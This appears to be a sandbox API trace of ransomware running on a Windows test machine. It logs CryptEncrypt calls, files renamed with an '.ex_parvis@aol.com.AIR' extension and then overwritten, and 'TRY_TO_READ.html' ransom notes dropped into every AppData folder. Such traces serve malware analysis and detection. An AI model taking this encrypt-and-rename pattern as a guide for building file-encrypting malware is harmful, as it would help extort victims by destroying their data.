	[0105.479] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.479] GetProcessHeap () returned 0x540000
	[0105.479] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.479] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.480] WriteFile (in: hFile=0x200, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.481] WriteFile (in: hFile=0x200, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.481] WriteFile (in: hFile=0x200, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.481] ReadFile (in: hFile=0x200, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x545, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x545, lpOverlapped=0x0) returned 1
	[0105.482] SetFilePointer (in: hFile=0x200, lDistanceToMove=-1349, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0105.482] WriteFile (in: hFile=0x200, lpBuffer=0x609bb8*, nNumberOfBytesToWrite=0x545, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesWritten=0x3a1f778*=0x545, lpOverlapped=0x0) returned 1
	[0105.482] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.482] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.482] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi", dwFileAttributes=0x80) returned 1
	[0105.483] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 90
	[0105.483] GetProcessHeap () returned 0x540000
	[0105.483] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x11a) returned 0x57fb28
	[0105.483] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi"
	[0105.483] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.483] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.485] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200
	[0105.485] GetProcessHeap () returned 0x540000
	[0105.485] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0105.485] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=2517504) returned 1
	[0105.485] SetFilePointer (in: hFile=0x200, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x266a00
	[0105.485] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.485] GetProcessHeap () returned 0x540000
	[0105.485] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.485] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.485] WriteFile (in: hFile=0x200, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.487] WriteFile (in: hFile=0x200, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.487] WriteFile (in: hFile=0x200, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.487] ReadFile (in: hFile=0x200, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x266a00, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x266a00, lpOverlapped=0x0) returned 1
	[0105.613] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe60835d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe60835d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dac70
	[0105.613] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe60835d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe60835d0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0105.613] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1
	[0105.613] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504
	[0105.614] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1
	[0105.614] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Application Data\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\application data\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504
	[0105.648] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65f935c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x65f935c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x65f935c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps", cAlternateFileName="")) returned 1
	[0105.648] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504
	[0105.651] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x65e16800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6adbe1a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6adbe1a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1
	[0105.651] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\deployment\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504
	[0105.653] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9791f220, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x1a918, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GDIPFONTCACHEV1.DAT", cAlternateFileName="GDIPFO~1.DAT")) returned 1
	[0105.653] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1
	[0105.653] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504
	[0105.655] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1
	[0105.655] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\history\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504
	[0105.657] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x28f14980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f14980, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2b9fc540, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x126775, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1
	[0105.657] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x962f4540, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x962f4540, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1
	[0105.657] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe80ff230, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1
	[0105.657] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft help\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504
	[0105.659] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb7314c10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb7314c10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1
	[0105.659] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504
	[0105.661] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xbd1a6580, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xbd1a6580, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1
	[0105.661] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1
	[0105.661] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504
	[0105.664] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe60835d0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe60835d0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe60a9730, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0105.664] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1
	[0105.664] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\virtualstore\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504
	[0105.665] FindNextFileW (in: hFindFile=0x5dac70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0
	[0105.666] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.666] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.666] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", dwFileAttributes=0x80) returned 1
	[0105.666] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned 57
	[0105.666] GetProcessHeap () returned 0x540000
	[0105.666] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd8) returned 0x603bd0
	[0105.666] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db"
	[0105.666] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.666] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.669] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504
	[0105.669] GetProcessHeap () returned 0x540000
	[0105.669] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0105.669] GetFileSizeEx (in: hFile=0x504, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1206133) returned 1
	[0105.670] SetFilePointer (in: hFile=0x504, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x126775
	[0105.670] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.670] GetProcessHeap () returned 0x540000
	[0105.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.670] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.670] WriteFile (in: hFile=0x504, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.671] WriteFile (in: hFile=0x504, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.671] WriteFile (in: hFile=0x504, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.671] ReadFile (in: hFile=0x504, lpBuffer=0x23e0020, nNumberOfBytesToRead=0x126775, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x23e0020*, lpNumberOfBytesRead=0x3a1f778*=0x126775, lpOverlapped=0x0) returned 1
	[0105.718] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.718] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.718] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", dwFileAttributes=0x80) returned 1
